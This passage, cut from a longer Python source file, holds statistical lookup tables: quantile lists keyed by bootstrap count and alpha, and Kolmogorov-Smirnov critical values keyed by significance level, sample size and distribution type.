0.6630363464355478, 0.6682652664184578, 0.6735021209716805, 0.678747215270997, 0.6840005493164072, 0.6892622756958018, 0.6945326232910167, 0.6998117446899426, 0.7050997924804701, 0.7103969955444349, 0.7157034301757828, 0.7210194778442398, 0.7263452148437517, 0.7316809463500995, 0.7370269012451192, 0.7423833084106466, 0.7477504730224629, 0.7531287002563496, 0.7585182952880878, 0.7639195632934588, 0.7693328857421893, 0.7747586441040055, 0.7801972198486344, 0.785649147033693, 0.7911147308349626, 0.796594657897951, 0.8020893096923847, 0.8075993728637716, 0.813125457763674, 0.8186683273315452, 0.824228668212893, 0.8298072433471704, 0.8354051208496118, 0.8410232925415064, 0.8466627502441431, 0.8523247909545921, 0.858010711669924, 0.8637222671508811, 0.8694609832763693, 0.875228843688967, 0.8810282135009788, 0.8868616104125999, 0.8927320098876976, 0.8986429977417016, 0.9045986175537135, 0.9106038284301785, 0.9166648864746121, 0.922789039611819, 0.9289858245849636, 0.9352674484252956, 0.9416502380371119, 0.9481566238403347, 0.9548195648193389, 0.961690254211429, 0.9688574218750032, 0.9765015029907258, 0.9851329803466828], # skipcq: FLK-E501 'num_bt = 200, alpha = 0.025': [0.00012660980224609377, 0.0012133789062500006, 0.0031041336059570313, 0.00547554016113281, 0.00816616058349609, 0.011087417602539059, 0.014185523986816401, 0.017424774169921872, 0.020780448913574223, 0.024234161376953132, 0.027772254943847663, 0.031383972167968746, 0.03506069183349609, 0.03879554748535156, 0.042582817077636705, 0.046417617797851536, 0.0502959060668945, 0.05421424865722652, 0.058169593811035106, 0.06215934753417964, 0.06618122100830073, 0.07023315429687496, 0.07431339263916009, 0.0784202575683593, 0.08255237579345695, 0.08670837402343741, 0.09088710784912102, 0.09508750915527336, 0.09930858612060539, 0.10354949951171868, 0.10780941009521477, 0.11208747863769523, 0.11638309478759756, 0.12069564819335926, 0.12502437591552723, 0.12936889648437494, 0.13372867584228512, 0.13810310363769526, 
0.14249187469482413, 0.14689445495605458, 0.1513105392456054, 0.15573974609374996, 0.1601816940307617, 0.16463607788085938, 0.1691025161743164, 0.17358085632324222, 0.1780707168579102, 0.1825718688964844, 0.18708415985107427, 0.19160713195800783, 0.1961407852172852, 0.20068489074707038, 0.20523906707763678, 0.20980331420898446, 0.21437740325927743, 0.21896118164062506, 0.2235544204711915, 0.2281569671630861, 0.23276882171630878, 0.2373896789550783, 0.2420194625854494, 0.2466580200195314, 0.25130535125732434, 0.25596115112304696, 0.26062549591064466, 0.26529823303222666, 0.26997913360595704, 0.27466827392578125, 0.27936550140380856, 0.28407066345214843, 0.28878376007080075, 0.2935047149658203, 0.2982334518432618, 0.3029698181152345, 0.3077138137817384, 0.31246543884277356, 0.3172245407104493, 0.3219910430908204, 0.32676502227783205, 0.3315462493896485, 0.3363348007202148, 0.3411306762695312, 0.3459336471557617, 0.35074386596679696, 0.35556118011474624, 0.3603855895996096, 0.36521709442138695, 0.37005554199218776, 0.3749010848999026, 0.3797535705566409, 0.3846130752563479, 0.3894794464111331, 0.3943527603149417, 0.3992329406738284, 0.4041200637817386, 0.4090139770507816, 0.4139148330688479, 0.4188224792480471, 0.42373706817626977, 0.4286584472656253, 0.433586692810059, 0.43852172851562543, 0.44346363067627004, 0.4484123992919927, 0.45336803436279355, 0.45833053588867245, 0.46329982757568416, 0.4682761383056646, 0.4732592391967779, 0.47824928283691465, 0.4832463455200201, 0.4882502746582037, 0.49326122283935603, 0.4982791900634771, 0.5033041000366216, 0.5083361816406258, 0.5133752822875985, 0.5184215545654305, 0.523474998474122, 0.5285356903076182, 0.5336035537719737, 0.5386787414550791, 0.5437613296508799, 0.5488512420654308, 0.5539486312866222, 0.5590534973144541, 0.5641659927368174, 0.5692860412597667, 0.5744137954711925, 0.5795494079589856, 0.584692726135255, 0.5898440551757824, 0.5950033950805675, 0.6001707458496106, 0.605346260070802, 0.6105300903320323, 
0.6157223129272471, 0.6209229278564463, 0.6261321640014659, 0.6313500976562509, 0.6365768814086923, 0.6418125152587899, 0.6470573043823251, 0.6523112487792979, 0.657574577331544, 0.6628474426269542, 0.6681299209594738, 0.6734222412109387, 0.6787246322631848, 0.6840371704101575, 0.6893601608276381, 0.6946936798095718, 0.7000381088256851, 0.7053936004638688, 0.7107603836059586, 0.7161387634277359, 0.7215289688110367, 0.7269313049316422, 0.7323460769653336, 0.7377736663818375, 0.7432143020629898, 0.7486685180664077, 0.7541365432739273, 0.7596189117431658, 0.7651160049438495, 0.770628433227541, 0.7761565017700216, 0.7817009735107443, 0.7872623825073264, 0.7928412628173851, 0.7984385299682641, 0.8040547180175805, 0.8096908187866236, 0.8153476715087917, 0.8210262680053737, 0.8267276763916043, 0.8324530410766631, 0.8382038116455108, 0.843981285095218, 0.8497872161865265, 0.8556233596801788, 0.8614917755126983, 0.8673948287963897, 0.8733351135253937, 0.8793157577514681, 0.8853402709960971, 0.8914127731323276, 0.8975381469726595, 0.9037223434448278, 0.909972457885746, 0.9162973403930701, 0.922708053588871, 0.9292190170288124, 0.9358493804931678, 0.9426256179809609, 0.949586410522465, 0.9567917251586955, 0.9643453216552775, 0.9724580764770547, 0.981724624633793], # skipcq: FLK-E501 'num_bt = 100, alpha = 0.1': [0.0010530471801757815, 0.005330657958984376, 0.011070747375488285, 0.01755897521972656, 0.024520378112792965, 0.03181716918945312, 0.039369010925292956, 0.0471240997314453, 0.0550467300415039, 0.06311126708984374, 0.07129817962646484, 0.07959266662597655, 0.08798267364501955, 0.0964585876464844, 0.10501262664794928, 0.11363807678222662, 0.12232944488525396, 0.13108200073242193, 0.13989154815673835, 0.14875457763671884, 0.15766803741455088, 0.16662918090820322, 0.1756356430053712, 0.18468521118164077, 0.19377597808837904, 0.20290626525878921, 0.21207454681396504, 0.22127944946289085, 0.23051967620849634, 0.23979415893554712, 0.24910182952880888, 0.25844184875488313, 
0.2678132247924808, 0.2772153472900394, 0.28664737701416043, 0.29610877990722684, 0.30559902191162136, 0.31511749267578154, 0.32466373443603547, 0.3342373657226566, 0.3438380813598637, 0.3534654235839848, 0.363119163513184, 0.37279899597168015, 0.3825047683715824, 0.39223625183105515, 0.4019932937622075, 0.4117758178710942, 0.4215836715698247, 0.4314168548583989, 0.4412752151489262, 0.45115890502929734, 0.4610678482055669, 0.47100219726562553, 0.48096195220947324, 0.4909472656250006, 0.5009583663940438, 0.5109952545166023, 0.5210583877563484, 0.5311478424072273, 0.5412639999389655, 0.5514071655273443, 0.5615777206420904, 0.5717761230468756, 0.5820027542114266, 0.5922581481933602, 0.6025429153442392, 0.612857666015626, 0.6232031631469737, 0.6335800170898447, 0.6439892196655284, 0.654431610107423, 0.6649082565307629, 0.6754202270507825, 0.6859688186645521, 0.6965554809570325, 0.7071815872192395, 0.7178489685058607, 0.7285595321655287, 0.739315338134767, 0.7501188278198256, 0.7609728240966811, 0.7718803024292007, 0.7828448486328139, 0.7938705825805679, 0.8049623107910171, 0.8161255264282241, 0.827366867065431, 0.8386942672729505, 0.8501174163818372, 0.8616481399536144, 0.8733016204833997, 0.8850971603393565, 0.8970608520507823, 0.9092285537719738, 0.9216524505615247, 0.9344142532348645, 0.9476547241210949, 0.9616604995727549, 0.9772372436523449], # skipcq: FLK-E501 'num_bt = 100, alpha = 0.05': [0.0005128097534179688, 0.0035651397705078114, 0.008225822448730467, 0.01377662658691406, 0.019905586242675778, 0.026449737548828123, 0.03331188201904297, 0.040428848266601564, 0.0477566146850586, 0.055263214111328125, 0.06292453765869141, 0.07072181701660157, 0.07864017486572264, 0.0866675567626953, 0.09479404449462892, 0.10301116943359379, 0.11131214141845708, 0.1196907806396485, 0.12814197540283206, 0.13666130065917975, 0.14524478912353522, 0.15388900756835944, 0.16259090423583994, 0.17134765625000012, 0.18015705108642593, 0.18901679992675796, 0.19792491912841811, 
0.2068797302246095, 0.21587963104248062, 0.22492324829101581, 0.23400913238525406, 0.24313629150390642, 0.2523035049438478, 0.26150985717773456, 0.2707544326782229, 0.2800365447998049, 0.2893553543090823, 0.29871025085449254, 0.30810070037841836, 0.31752601623535204, 0.32698581695556694, 0.33647972106933655, 0.34600734710693426, 0.3555682373046881, 0.36516231536865296, 0.37478912353515687, 0.3844486618041999, 0.39414070129394607, 0.4038650131225594, 0.41362174987793054, 0.42341068267822346, 0.4332318878173837, 0.443085365295411, 0.4529711914062508, 0.46288959503173915, 0.4728406524658212, 0.48282451629638756, 0.4928414916992196, 0.5028918075561533, 0.5129758453369149, 0.5230939102172858, 0.5332465362548835, 0.5434341049194344, 0.5536571502685554, 0.5639163589477547, 0.5742122650146493, 0.5845457077026375, 0.5949174499511725, 0.605328330993653, 0.6157794189453132, 0.6262716293334969, 0.6368063354492195, 0.6473846817016609, 0.6580081939697273, 0.6686784744262704, 0.6793972015380867, 0.6901663589477547, 0.7009882354736336, 0.7118651199340829, 0.7227997589111337, 0.7337952804565437, 0.7448551177978522, 0.7559832382202156, 0.767184143066407, 0.778463096618653, 0.7898260498046881, 0.8012801742553717, 0.812833862304688, 0.8244971847534186, 0.836282348632813, 0.8482045364379889, 0.8602828979492192, 0.8725419998168951, 0.8850147247314459, 0.8977466201782232, 0.9108037567138676, 0.9242892074584965, 0.9383808135986333, 0.9534402084350593, 0.9704869842529305], # skipcq: FLK-E501 'num_bt = 100, alpha = 0.025': [0.00025318145751953127, 0.0024313354492187496, 0.00622997283935547, 0.011004486083984376, 0.016431846618652345, 0.022334899902343747, 0.02860530853271484, 0.03517158508300782, 0.04198360443115235, 0.04900466918945313, 0.056207008361816406, 0.06356887817382811, 0.07107303619384765, 0.07870536804199217, 0.0864543533325195, 0.09431030273437495, 0.10226490020751948, 0.11031120300292963, 0.11844318389892572, 0.12665557861328114, 0.13494373321533193, 0.14330360412597648, 
0.15173160552978507, 0.1602246093749999, 0.16877971649169915, 0.1773944091796874, 0.18606639862060537, 0.19479362487792956, 0.20357418060302723, 0.21240638732910144, 0.22128879547119132, 0.23021987915039055, 0.23919857025146474, 0.24822349548339834, 0.25729381561279285, 0.26640838623046864, 0.2755665969848631, 0.2847674560546874, 0.2940104293823241, 0.3032947540283201, 0.31261997222900373, 0.32198554992675765, 0.33139102935791, 0.3408360290527342, 0.350320243835449, 0.35984336853027327, 0.369405174255371, 0.3790055084228515, 0.38864414215087884, 0.3983211517333983, 0.4080363082885741, 0.4177897644042967, 0.42758152008056627, 0.43741157531738273, 0.44728015899658197, 0.45718749999999997, 0.46713375091552733, 0.4771192169189453, 0.48714420318603513, 0.49720916748046873, 0.5073144912719727, 0.517460708618164, 0.5276483535766601, 0.5378781127929686, 0.5481506729125976, 0.5584667205810545, 0.5688272476196286, 0.5792331695556638, 0.589685478210449, 0.600185317993164, 0.6107340621948241, 0.6213330078124999, 0.631983757019043, 0.6426879119873048, 0.6534475326538087, 0.6642645263671876, 0.6751412582397462, 0.6860803222656253, 0.6970846176147463, 0.7081573486328125, 0.7193020248413087, 0.7305229187011719, 0.7418246078491211, 0.7532124328613279, 0.7646924972534177, 0.7762720489501949, 0.7879593276977535, 0.7997643280029292, 0.8116988754272456, 0.8237773895263665, 0.8360177230834953, 0.8484423828124994, 0.8610802841186516, 0.8739700317382804, 0.8871651077270499, 0.9007428741455068, 0.9148239517211905, 0.9296160888671865, 0.9455405807495105, 0.9637833404541005], # skipcq: FLK-E501 'num_bt = 50, alpha = 0.1': [0.002104988098144531, 0.010686798095703127, 0.022243995666503903, 0.03534767150878906, 0.04944561004638671, 0.06426040649414061, 0.07962970733642577, 0.09544906616210938, 0.11164653778076172, 0.12817016601562498, 0.14498111724853516, 0.1620494842529297, 0.1793517684936524, 0.19686920166015628, 0.21458644866943363, 0.23249114990234374, 0.25057315826416016, 
0.2688238525390625, 0.28723644256591796, 0.30580520629882824, 0.32452541351318376, 0.34339347839355494, 0.36240657806396515, 0.38156257629394563, 0.4008601760864261, 0.42029869079589877, 0.439878196716309, 0.45959922790527385, 0.4794631576538091, 0.4994721984863286, 0.5196290206909184, 0.5399374389648441, 0.5604021072387699, 0.5810285949707035, 0.601823997497559, 0.6227967071533207, 0.6439570236206058, 0.6653173065185549, 0.6868929672241213, 0.7087026977539064, 0.7307703018188476, 0.7531256103515627, 0.7758077621459962, 0.7988690185546876, 0.8223818588256835, 0.8464518737792968, 0.8712435531616209, 0.897040786743164, 0.9244193649291994, 0.9549925994873047], # skipcq: FLK-E501 'num_bt = 50, alpha = 0.05': [0.0010253524780273436, 0.007153701782226562, 0.016551856994628904, 0.027787704467773428, 0.040236625671386715, 0.053571395874023424, 0.06759670257568356, 0.08218505859375, 0.09724811553955079, 0.11272163391113282, 0.1285573959350586, 0.14471817016601565, 0.1611745834350586, 0.1779032135009766, 0.19488491058349616, 0.2121041107177735, 0.22954799652099614, 0.24720588684082034, 0.2650691604614259, 0.28313056945800796, 0.3013843917846682, 0.3198258972167971, 0.33845157623291044, 0.3572587585449221, 0.376245918273926, 0.395412063598633, 0.4147572708129885, 0.4342823791503908, 0.45398914337158225, 0.4738802337646486, 0.4939592361450197, 0.5142308807373048, 0.5347008895874026, 0.5553767395019535, 0.5762670516967778, 0.5973825836181648, 0.6187364578247077, 0.6403443145751957, 0.6622255325317388, 0.6844039154052739, 0.7069094467163091, 0.7297798919677738, 0.7530647659301761, 0.7768299865722659, 0.8011670303344729, 0.826208877563477, 0.852162818908692, 0.8793858337402352, 0.9086018753051766, 0.9418449401855475], # skipcq: FLK-E501 'num_bt = 50, alpha = 0.025': [0.0005062484741210939, 0.004881439208984375, 0.012548561096191409, 0.022227935791015625, 0.03327510833740233, 0.045335311889648414, 0.058191719055175756, 0.07170074462890623, 0.08576206207275389, 0.10030220031738282, 
0.11526584625244143, 0.1306098937988281, 0.1463006210327148, 0.1623106384277343, 0.17861782073974602, 0.1952041625976562, 0.21205471038818355, 0.22915710449218749, 0.24650104522705074, 0.26407836914062494, 0.28188220977783196, 0.29990722656249996, 0.31814914703369135, 0.3366050720214844, 0.3552730178833008, 0.37415191650390633, 0.3932419967651368, 0.4125440979003908, 0.4320604324340822, 0.4517940521240237, 0.47174915313720733, 0.4919313812255862, 0.5123475265502933, 0.5330061340332035, 0.5539176559448247, 0.5750946807861332, 0.5965523147583014, 0.6183092498779303, 0.6403881454467779, 0.6628169250488287, 0.685630607604981, 0.7088736724853519, 0.7326040267944338, 0.7568986511230471, 0.7818646621704104, 0.8076572418212895, 0.8345180892944339, 0.8628623962402346, 0.8935304641723636, 0.9288782501220707], # skipcq: FLK-E501 'num_bt = 30, alpha = 0.1': [0.003505865732828776, 0.0178689956665039, 0.03730777104695638, 0.05944360097249348, 0.08335453669230143, 0.10857747395833334, 0.13484245936075845, 0.16197719573974612, 0.18986501693725588, 0.21842352549235028, 0.24759359359741212, 0.2773321787516274, 0.3076083819071449, 0.33840077718098927, 0.3696960131327308, 0.40148760477701795, 0.4337754885355629, 0.4665662765502927, 0.4998735745747882, 0.5337188084920246, 0.5681330680847166, 0.6031595865885414, 0.6388580004374184, 0.6753109614054361, 0.7126363436381019, 0.7510082880655921, 0.7907005627950029, 0.8321870803833004, 0.8764300346374508, 0.926118723551432], # skipcq: FLK-E501 'num_bt = 30, alpha = 0.05': [0.0017083168029785158, 0.011975797017415368, 0.02781553268432617, 0.04685484568277994, 0.06805556615193684, 0.09087403615315756, 0.11498689651489258, 0.14018510182698568, 0.1663259824117025, 0.19330844879150394, 0.22105944951375328, 0.2495258967081706, 0.2786695798238119, 0.30846405029296875, 0.3388926506042481, 0.3699475606282553, 0.4016289710998535, 0.4339452743530273, 0.46691370010375977, 0.5005613327026367, 0.5349272727966307, 0.5700660705566404, 0.6060525576273598, 
0.6429908752441403, 0.6810288429260251, 0.7203848520914709, 0.7614021619160968, 0.8046739578247067, 0.851403903961181, 0.9049661636352534], # skipcq: FLK-E501 'num_bt = 30, alpha = 0.025': [0.0008435885111490885, 0.008178138732910154, 0.021117115020751948, 0.03755346934000651, 0.056421693166097, 0.07713553110758462, 0.09933786392211913, 0.12279478708902995, 0.1473451932271322, 0.1728741963704427, 0.19929863611857096, 0.22655766805013022, 0.2546075503031413, 0.283418083190918, 0.3129702568054199, 0.3432552337646484, 0.3742734591166178, 0.4060349146525065, 0.4385598182678224, 0.4718799591064454, 0.5060409863789878, 0.5411063512166342, 0.5771634737650556, 0.6143334706624354, 0.6527883211771653, 0.6927816390991218, 0.7347115516662605, 0.7792645772298182, 0.827830537160238, 0.8842966715494796], # skipcq: FLK-E501 'num_bt = 20, alpha = 0.1': [0.005254220962524414, 0.026914119720458988, 0.05641789436340332, 0.0902134895324707, 0.12692608833312985, 0.16587238311767571, 0.20666403770446767, 0.24906482696533194, 0.29292883872985825, 0.33817090988159165, 0.3847514629364012, 0.4326707839965818, 0.4819692134857176, 0.5327330589294432, 0.5851095676422118, 0.6393381118774413, 0.6958132266998289, 0.7552347183227537, 0.8190390110015868, 0.8912508964538572], # skipcq: FLK-E501 'num_bt = 20, alpha = 0.05': [0.002561426162719727, 0.01806516647338867, 0.04216942787170409, 0.07135391235351564, 0.1040808200836182, 0.13955373764038093, 0.17731089591979982, 0.21706857681274416, 0.25865063667297367, 0.30195388793945327, 0.3469314098358156, 0.39358491897583026, 0.4419655323028567, 0.49218158721923855, 0.5444176197052006, 0.5989718437194829, 0.6563361644744876, 0.7173814773559575, 0.7838938236236577, 0.8608916282653813], # skipcq: FLK-E501 'num_bt = 20, alpha = 0.025': [0.0012650966644287111, 0.012348556518554692, 0.032070970535278326, 0.05733404159545899, 0.08657145500183107, 0.11893157958984377, 0.1539091587066651, 0.19119005203247075, 0.2305778980255127, 0.27195787429809565, 
0.31527810096740716, 0.36054258346557605, 0.4078114986419677, 0.4572108268737792, 0.5089540958404539, 0.5633859634399412, 0.6210731983184814, 0.6830172538757324, 0.7512671947479248, 0.8315665245056152] # skipcq: FLK-E501 } # List of the maximal values to the significance niveau 'gof_alpha', the sample-size 'num_init' and the single # distributions in the initial KS-tests self.crit_val_ini_ks = {0.001: {1000: {'uni': 0.06174732010933548, 'nor': 0.03896795290941646, 'beta1': 0.06139681196262953, 'beta2': 0.12199585736700946, 'beta4': 0.04582502097984753}, 750: {'uni': 0.07024635538683371, 'nor': 0.04459569470155689, 'beta1': 0.07021684632565739, 'beta2': 0.12815976069728274, 'beta4': 0.05264080908630758}, 500: {'uni': 0.08642770525355598, 'nor': 0.05509110394413119, 'beta1': 0.08761941562012493, 'beta2': 0.14913744793549832, 'beta4': 0.06421826877149445}, 400: {'uni': 0.09655798845997815, 'nor': 0.0613993273533881, 'beta1': 0.0964224097850293, 'beta2': 0.15858083637195353, 'beta4': 0.07290090814924588}, 300: {'uni': 0.11164843625013415, 'nor': 0.07106128126671396, 'beta1': 0.11009775320915205, 'beta2': 0.17523769295342007, 'beta4': 0.08305783948716328}, 200: {'uni': 0.13628359610263507, 'nor': 0.08740964922426725, 'beta1': 0.1376486743610651, 'beta2': 0.2010516066361282, 'beta4': 0.10286264686710184}, 150: {'uni': 0.15651662849813364, 'nor': 0.10038713469524929, 'beta1': 0.15819608234185656, 'beta2': 0.22229910725996993, 'beta4': 0.11634654326012955}, 100: {'uni': 0.19072306639877157, 'nor': 0.12280360833310089, 'beta1': 0.19321091289173042, 'beta2': 0.2581947494944321, 'beta4': 0.14328917055317145}, 75: {'uni': 0.21934961884964826, 'nor': 0.14015948249260646, 'beta1': 0.2219326490803759, 'beta2': 0.2846540951939676, 'beta4': 0.1652852320527448}, 50: {'uni': 0.2645907926740654, 'nor': 0.1710961682554944, 'beta1': 0.2678719773943101, 'beta2': 0.3289035352446858, 'beta4': 0.1999598991299047}, 30: {'uni': 0.3379078488296823, 'nor': 0.21594948610382936, 'beta1': 
0.3441129978995892, 'beta2': 0.39361692414493443, 'beta4': 0.2508472086556259}, 20: {'uni': 0.3959074827161117, 'nor': 0.2608433948642659, 'beta1': 0.4133477648489873, 'beta2': 0.44853631830721913, 'beta4': 0.29952120108891395}, 10: {'uni': 0.5170765814161853, 'nor': 0.35733312354157704, 'beta1': 0.5398708466808257, 'beta2': 0.5422967523113658, 'beta4': 0.40686356644018595}}, 0.005: {1000: {'uni': 0.05458116632544635, 'nor': 0.03504577921766977, 'beta1': 0.054517449744692026, 'beta2': 0.10728185476765839, 'beta4': 0.040733497260050544}, 750: {'uni': 0.06253533672182854, 'nor': 0.04046369401135186, 'beta1': 0.06282543848266553, 'beta2': 0.11279561980513325, 'beta4': 0.04705273659300363}, 500: {'uni': 0.07714054796228054, 'nor': 0.0496468687606364, 'beta1': 0.07693955943931102, 'beta2': 0.1327433163224424, 'beta4': 0.05731924299024538}, 400: {'uni': 0.08617878042484084, 'nor': 0.05541748786526407, 'beta1': 0.08588821546881897, 'beta2': 0.13875443390078235, 'beta4': 0.06439825899654178}, 300: {'uni': 0.0986714495305242, 'nor': 0.06407724459065156, 'beta1': 0.09855314389102021, 'beta2': 0.1548737996243767, 'beta4': 0.07467900099977004}, 200: {'uni': 0.12062451647295991, 'nor': 0.07827596978503826, 'beta1': 0.12126943895923059, 'beta2': 0.17825544608232347, 'beta4': 0.09076754278924304}, 150: {'uni': 0.1396796839473482, 'nor': 0.09009210049264571, 'beta1': 0.14063288933757345, 'beta2': 0.1973907310236372, 'beta4': 0.10499002205047378}, 100: {'uni': 0.16922995185830964, 'nor': 0.10980683219099052, 'beta1': 0.17129406122009094, 'beta2': 0.22813210844235704, 'beta4': 0.12749534525918932}, 75: {'uni': 0.1953541681412001, 'nor': 0.12554665985678326, 'beta1': 0.19610381489611384, 'beta2': 0.25287194709425875, 'beta4': 0.1469739325714672}, 50: {'uni': 0.23503320028575814, 'nor': 0.15335710820924087, 'beta1': 0.23890161565850354, 'beta2': 0.2925965166545206, 'beta4': 0.17739407623100112}, 30: {'uni': 0.2976485313317806, 'nor': 0.19613498929034934, 'beta1': 0.3040864499477276, 
'beta2': 0.35138347538048526, 'beta4': 0.22579108547722582}, 20: {'uni': 0.35388424243927113, 'nor': 0.23656926834477043, 'beta1': 0.36668171084515955, 'beta2': 0.39736542044382106, 'beta4': 0.2701286497170594}, 10: {'uni': 0.4630097657380493, 'nor': 0.3225433246916215, 'beta1': 0.47835376241010186, 'beta2': 0.4896209566095471, 'beta4': 0.36159750656596396}}, 0.01: {1000: {'uni': 0.05134454385349413, 'nor': 0.03330600875133105, 'beta1': 0.051275152087156495, 'beta2': 0.10009870323144221, 'beta4': 0.03865995666339189}, 750: {'uni': 0.05905726508494702, 'nor': 0.0383879788508078, 'beta1': 0.059272477516056354, 'beta2': 0.10502806705945988, 'beta4': 0.04450291981279328}, 500: {'uni': 0.07249296242654668, 'nor': 0.046932424204244594, 'beta1': 0.07240630431885364, 'beta2': 0.12408220110978818, 'beta4': 0.05424039706492939}, 400: {'uni': 0.080902691313323, 'nor': 0.05248129300353904, 'beta1': 0.08043677899242607, 'beta2': 0.12974923298059704, 'beta4': 0.06073621209890695}, 300: {'uni': 0.09306590895115929, 'nor': 0.06042909220901882, 'beta1': 0.0929294897119688, 'beta2': 0.14441139871845998, 'beta4': 0.07029934609881988}, 200: {'uni': 0.11331581936959173, 'nor': 0.07407780477974035, 'beta1': 0.11400852794991234, 'beta2': 0.16697088723911058, 'beta4': 0.08578814408291241}, 150: {'uni': 0.13110747055603822, 'nor': 0.08511174074211825, 'beta1': 0.13197498872552438, 'beta2': 0.18525721022812291, 'beta4': 0.09923887427643563}, 100: {'uni': 0.15947898396010982, 'nor': 0.10396630211898589, 'beta1': 0.16076780252138057, 'beta2': 0.21274473456821097, 'beta4': 0.1203847339328595}, 75: {'uni': 0.18341423985159883, 'nor': 0.11924687585622445, 'beta1': 0.1847923465861807, 'beta2': 0.23689175806686585, 'beta4': 0.13862384194648647}, 50: {'uni': 0.22065058332465762, 'nor': 0.14525710370631756, 'beta1': 0.2245287846345721, 'beta2': 0.27453195725371937, 'beta4': 0.16751626430377106}, 30: {'uni': 0.2806366070013675, 'nor': 0.18585975643934483, 'beta1': 0.28507040255377625, 'beta2': 
0.32929770986141144, 'beta4': 0.2134224231720387}, 20: {'uni': 0.3334575751692692, 'nor': 0.22511252321148278, 'beta1': 0.3441640350433964, 'beta2': 0.3740749374193295, 'beta4': 0.2544162136548306}, 10: {'uni': 0.4366755558485817, 'nor': 0.3071991308976279, 'beta1': 0.4527891584489994, 'beta2': 0.46379050302844543, 'beta4': 0.34067023770504523}}, 0.05: {1000: {'uni': 0.04280142303978185, 'nor': 0.02860827073335037, 'beta1': 0.04282682578644642, 'beta2': 0.07986970874762322, 'beta4': 0.03275686429767982}, 750: {'uni': 0.049427811587210435, 'nor': 0.03298169164204601, 'beta1': 0.049275909605582924, 'beta2': 0.08486927467601035, 'beta4': 0.03775404114622272}, 500: {'uni': 0.06038458458366747, 'nor': 0.04027106205628239, 'beta1': 0.060195942616294934, 'beta2': 0.09995114375214009, 'beta4': 0.04613912209290452}, 400: {'uni': 0.0671626804698282, 'nor': 0.044967180104620696, 'beta1': 0.06747611786364349, 'beta2': 0.10571668604744544, 'beta4': 0.05152182574562672}, 300: {'uni': 0.07742312239112692, 'nor': 0.051666837623702166, 'beta1': 0.07767087703759445, 'beta2': 0.1178767433776362, 'beta4': 0.059452507414415046}, 200: {'uni': 0.09469966587530276, 'nor': 0.06343358521113673, 'beta1': 0.0950578895294647, 'beta2': 0.1366784736556006, 'beta4': 0.07255703928500457}, 150: {'uni': 0.10900935208153273, 'nor': 0.07289171579483816, 'beta1': 0.11002479909769114, 'beta2': 0.15242729269865973, 'beta4': 0.08373240678443566}, 100: {'uni': 0.13281274766076206, 'nor': 0.08920713936479638, 'beta1': 0.13377803165947766, 'beta2': 0.17499650468558625, 'beta4': 0.10190606958299475}, 75: {'uni': 0.15239779918045748, 'nor': 0.10243980804370362, 'beta1': 0.1541106817008704, 'beta2': 0.19485071272087295, 'beta4': 0.11705102736538112}, 50: {'uni': 0.18438141684534104, 'nor': 0.12466885274854955, 'beta1': 0.18728113451838269, 'beta2': 0.22658281610394648, 'beta4': 0.14239913459102727}, 30: {'uni': 0.23331654346299174, 'nor': 0.15906588455123438, 'beta1': 0.2387860500631408, 'beta2': 
0.2718245732806131, 'beta4': 0.18048185108580744}, 20: {'uni': 0.2786314950878662, 'nor': 0.19349526617388257, 'beta1': 0.28589622085949756, 'beta2': 0.31147388293415956, 'beta4': 0.2164769385370286}, 10: {'uni': 0.3661289030334679, 'nor': 0.2658953985567251, 'beta1': 0.379401813819888, 'beta2': 0.38802519102270194, 'beta4': 0.2910744690699496}}, 0.1: {1000: {'uni': 0.038515938269794825, 'nor': 0.026313661922827247, 'beta1': 0.03860111298969593, 'beta2': 0.0695550650755411, 'beta4': 0.029845093507530562}, 750: {'uni': 0.04446055609985289, 'nor': 0.030266189959470058, 'beta1': 0.044472158939188655, 'beta2': 0.07438972690212953, 'beta4': 0.03440796201601326}, 500: {'uni': 0.054329235300242695, 'nor': 0.03705807984250126, 'beta1': 0.054235810729029665, 'beta2': 0.08755778874782771, 'beta4': 0.04215154900032181}, 400: {'uni': 0.06062042253055755, 'nor': 0.04134489759753035, 'beta1': 0.06087419042912867, 'beta2': 0.09290608277922241, 'beta4': 0.04695774138644898}, 300: {'uni': 0.06979122578785563, 'nor': 0.04752352646874458, 'beta1': 0.06987407314079985, 'beta2': 0.1036455137376669, 'beta4': 0.05408391441556548}, 200: {'uni': 0.08525612760509743, 'nor': 0.05822021391999288, 'beta1': 0.08573405996535222, 'beta2': 0.12083720989995606, 'beta4': 0.06606270634268102}, 150: {'uni': 0.09822498098395582, 'nor': 0.0670687425730856, 'beta1': 0.09891726246491339, 'beta2': 0.134942222786968, 'beta4': 0.07625187550090379}, 100: {'uni': 0.11942187198187654, 'nor': 0.08196700841704041, 'beta1': 0.12048182599113988, 'beta2': 0.15542188429324677, 'beta4': 0.0927888394179889}, 75: {'uni': 0.13700377353508753, 'nor': 0.09413798516069916, 'beta1': 0.13863023455324552, 'beta2': 0.1728224431499087, 'beta4': 0.10651114960711697}, 50: {'uni': 0.16595760075302907, 'nor': 0.11446069154286698, 'beta1': 0.1684755311187931, 'beta2': 0.20208064524892055, 'beta4': 0.12935863603313313}, 30: {'uni': 0.2099293273700812, 'nor': 0.1463282048690624, 'beta1': 0.21473921841431154, 'beta2': 
0.24269192295102882, 'beta4': 0.1646851441089735}, 20: {'uni': 0.25056763248182895, 'nor': 0.17786313124907188, 'beta1': 0.2575087202242632, 'beta2': 0.27927953593860777, 'beta4': 0.19740515280724447}, 10: {'uni': 0.3304962789807138, 'nor': 0.2447591671591835, 'beta1': 0.3420336141758848, 'beta2': 0.34940564498843646, 'beta4': 0.26587190498978686}}, 0.2: {1000: {'uni': 0.033759081350374254, 'nor': 0.02372992290154119, 'beta1': 0.03379104644423217, 'beta2': 0.05775603239505678, 'beta4': 0.026618493861847614}, 750: {'uni': 0.03897357249045624, 'nor': 0.027281398645080723, 'beta1': 0.038972994365299635, 'beta2': 0.0621653283130667, 'beta4': 0.030665891126849754}, 500: {'uni': 0.04758909935471711, 'nor': 0.03337684532828111, 'beta1': 0.047570804678383094, 'beta2': 0.07333077050088904, 'beta4': 0.037565566599256583}, 400: {'uni': 0.053119550234104085, 'nor': 0.03725028390570345, 'beta1': 0.053295404906414934, 'beta2': 0.0782294183344644, 'beta4': 0.04183281867666566}, 300: {'uni': 0.061196404682106964, 'nor': 0.04292324729747321, 'beta1': 0.06136906566660827, 'beta2': 0.08744970320312462, 'beta4': 0.04824159064240345}, 200: {'uni': 0.0746784511345509, 'nor': 0.0524733341649114, 'beta1': 0.07510973684586475, 'beta2': 0.10260712327402122, 'beta4': 0.058942065335903404}, 150: {'uni': 0.08595093737016697, 'nor': 0.060424202583133746, 'beta1': 0.08641030234814334, 'beta2': 0.1148837044228368, 'beta4': 0.0679067944916304}, 100: {'uni': 0.10443555935757931, 'nor': 